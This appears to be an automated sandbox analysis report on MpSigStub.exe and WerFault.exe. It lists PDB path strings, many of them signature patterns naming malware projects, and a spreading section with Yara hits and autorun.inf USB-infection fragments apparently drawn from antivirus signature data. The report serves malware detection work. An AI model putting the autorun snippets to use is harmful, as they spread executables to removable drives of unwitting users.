Source: Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: x:\werdon.pdb source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp
Source: Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp
Source: Binary string: BrowserManager.pdbxx source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp
Source: Binary string: msvfw32.pdb source: WerFault.exe, 00000005.00000003.2861476094.0000000005D6A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: hal.pdb source: MpSigStub.exe, 00000024.00000003.6320126679.00000197A4068000.00000004.00000001.sdmp
Source: Binary string: JOe|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: \mspass.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source: Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: JwEEPNd--41U6@yY_2Y.WDH6GG*6RbR.pdb source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: flzEnlAs.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000024.00000003.6310450817.00000197A4AFA000.00000004.00000001.sdmp
Source: Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000005.00000003.2858017646.000000000543F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918507179.00000000030CC000.00000004.00000001.sdmp
Source: Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000024.00000003.6298561221.00000197A4380000.00000004.00000001.sdmp
Source: Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp
Source: Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000024.00000003.6303526002.00000197A34ED000.00000004.00000001.sdmp
Source: Binary string: iashlpr.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source: Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: .C:\source\src\nssm\out\Release\win64\absrv.pdb source: MpSigStub.exe, 00000024.00000003.6312003576.00000197A3DD5000.00000004.00000001.sdmp
Source: Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000024.00000003.6309767237.00000197A3869000.00000004.00000001.sdmp
Source: Binary string: advapi32.pdb source: WerFault.exe, 00000005.00000003.2857984455.000000000543A000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp, MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: ZAService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: gMolq.pdb source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source: Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: rafotech\minisoft\tools\xyfa\Release\xyfa.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp
Source: Binary string: RamMap.pdb source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp
Source: Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp
Source: Binary string: CoreMessaging.pdb v source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: rpcss.pdb source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp
Source: Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp
Source: Binary string: bcryptprimitives.pdb( source: WerFault.exe, 00000005.00000003.2859705734.00000000054F2000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2920656846.000000000613C000.00000004.00000001.sdmp
Source: Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: sdmf|er.pdb source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp
Source: Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000024.00000003.6440763384.00000197A4E29000.00000004.00000001.sdmp
Source: Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp
Source: Binary string: ws2_32.pdb source: WerFault.exe, 00000005.00000003.2862263906.0000000005519000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp
Source: Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000024.00000003.6289251468.00000197A3F1F000.00000004.00000001.sdmp
Source: Binary string: irprops.pdbj source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: mciole32.pdb source: MpSigStub.exe, 00000024.00000003.6332905468.00000197A3592000.00000004.00000001.sdmp
Source: Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000024.00000003.6350622822.00000197A3F60000.00000004.00000001.sdmp
Source: Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: msimg32.pdb] source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp
Source: Binary string: Pb730.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: mqutil.pdb source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp
Source: Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp
Source: Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp
Source: Binary string: \Release\kugou.pdb source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp
Source: Binary string: usp10.pdbj source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: mstscax.pdb source: MpSigStub.exe, 00000024.00000003.6293664511.00000197A3192000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb( source: WerFault.exe, 00000005.00000003.2855890772.000000000299F000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918220694.00000000030AA000.00000004.00000001.sdmp
Source: Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: wwin32u.pdb0 source: WerFault.exe, 00000009.00000003.2962036020.00000000051D2000.00000004.00000040.sdmp
Source: Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: tixati.pdb source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp
Source: Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp
Source: Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000024.00000003.6340102815.00000197A329B000.00000004.00000001.sdmp
Source: Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000024.00000003.6277246842.00000197A454F000.00000004.00000001.sdmp
Source: Binary string: .+:\\Projects\\tidynet\\Release\\(selfdestruct|tidynetwork).pdb source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp
Source: Binary string: combase.pdb source: WerFault.exe, 00000005.00000003.2858586114.00000000029CB000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: hide_evr2.pdb source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: SKRFM.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: appmgmts.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp
Source: Binary string: apphelp.pdbz~ source: WerFault.exe, 00000005.00000003.2881791538.00000000049A2000.00000004.00000040.sdmp
Source: Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp
Source: Binary string: DownExecute.pdb source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp
Source: Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: \svr_d\server_lyl\WinSAP\winSAP_2\Release\winSAP_2.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000024.00000003.6312663720.00000197A3E58000.00000004.00000001.sdmp
Source: Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: wgdi32full.pdb( source: WerFault.exe, 00000005.00000003.2856914789.00000000029AA000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2918319280.00000000030B5000.00000004.00000001.sdmp
Source: Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp
Source: Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp
Source: Binary string: adptif.pdb source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp
Source: Binary string: shell32.pdb( source: WerFault.exe, 00000005.00000003.2871629055.0000000005FF0000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2940537649.0000000006800000.00000004.00000001.sdmp
Source: Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000024.00000003.6294257169.00000197A398C000.00000004.00000001.sdmp
Source: Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp
Source: Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp
Source: Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000024.00000003.6319165087.00000197A48CC000.00000004.00000001.sdmp
Source: Binary string: \x86\Release\swhost.pdb source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp
Source: Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp
Source: Binary string: ColorAdapterClient.pdb_ source: WerFault.exe, 00000005.00000003.2881840222.00000000049A9000.00000004.00000040.sdmp, WerFault.exe, 00000009.00000003.2962082422.00000000051D9000.00000004.00000040.sdmp
Source: Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: winmm.pdb( source: WerFault.exe, 00000005.00000003.2867958471.000000000605C000.00000004.00000001.sdmp, WerFault.exe, 00000009.00000003.2943062452.000000000686C000.00000004.00000001.sdmp
Source: Binary string: cmd.pdb source: MpSigStub.exe, 00000024.00000003.6269788057.00000197A4C44000.00000004.00000001.sdmp
Source: Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp
Source: Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000024.00000003.6318199174.00000197A3059000.00000004.00000001.sdmp
Source: Binary string: er.pdb source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp
Source: Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000024.00000003.6349678928.00000197A3C89000.00000004.00000001.sdmp
Source: Binary string: diskpart.pdb source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp
Source: Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp
Source: Binary string: wship6.pdb3 source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp
Source: Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp
Source: Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000024.00000003.6282020026.00000197A450D000.00000004.00000001.sdmp
Source: Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp
Source: Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp
Source: Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp
Source: Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp
Source: Binary string: dsget.pdb source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp
Source: Binary string: wmidx.pdbj source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp
Source: Binary string: ramaint.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp
Source: Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp
Source: Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp
Source: Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000024.00000003.6430077076.00000197A46D9000.00000004.00000001.sdmp
Source: Binary string: .:\GIT\addonInstaller\instui\Release\instui.pdb source: MpSigStub.exe, 00000024.00000003.6283020613.00000197A471D000.00000004.00000001.sdmp
Source: Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp
Source: Binary string: \\finalpro\\forlsa\\Win32Project.*\\Win32Project.+\.pdb source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp
Source: Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp
Source: Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp

Spreading:

barindex
Yara detected Neshta
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
Yara detected Autohotkey Downloader Generic
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 5556, type: MEMORYSTR
May infect USB drives
Source: MpSigStub.exe, 00000024.00000003.6293943264.00000197A31B6000.00000004.00000001.sdmp Binary or memory string: docopy/yautorun.inf%%x:autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp Binary or memory string: [autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp Binary or memory string: -[autorun]open=avm10\avm10stakakodimolim.exe
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp Binary or memory string: autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp Binary or memory string: autorun.infx
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: >> autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: .exe -h -s -r autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp Binary or memory string: shell\open=Open >> autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: [autorun];
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp Binary or memory string: x7[autorun];
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: [autorun]
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: echo [AutoRun] > %%
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: :\autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: |filesetattrib($var[$i]&"\autorun.inf","-hsr
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: =fileopen($var[$i]&"\autorun.inf",10)filewrite($
Source: MpSigStub.exe, 00000024.00000003.6435320664.00000197A4AB7000.00000004.00000001.sdmp Binary or memory string: ,"[autorun]"&@crlf)
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: [autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: p[autorun]shell\open\command=d:\systemvolumeinformation.exeshell\explore\command=d:\systemvolumeinformation.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: [autorun]open=service.exeshell\open=(&o)shell\open\command=service.exeshell\open\default=1shell\explore=(&x)shell\explore\command=service.exe
Source: MpSigStub.exe, 00000024.00000003.6438683964.00000197A371E000.00000004.00000001.sdmp Binary or memory string: :\autorun.infopenAutoRun]
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp Binary or memory string: SCPT:AutorunSCPT:Autorun.executeautorun.infSCPT:Autorun.execute.shopenSHELL\OPEN\COMMAND
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp Binary or memory string: nSCPT:Autorun.execute.shexec[autorun]action=open folder to view filesaction=abrir carpeta para ver los archivosshellexecute=icon=%systemroot%\system32\shell32.dll,4useautoplay=1[autorun]
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp Binary or memory string: [AutoRun]
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: \Autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: in(cdefghijklmnopqrstuvwxyz)doxcopy/h/y/r/kautorun.inf%%
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: [autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: f[autorun]open=shell\open=(&o)shell\open\command=s-
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp Binary or memory string: 1shell\install\command=foto.exe>>%co%autorun.inf
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: Autorun.inf]
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp Binary or memory string: autorun.infS
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp Binary or memory string: \autorun.inf
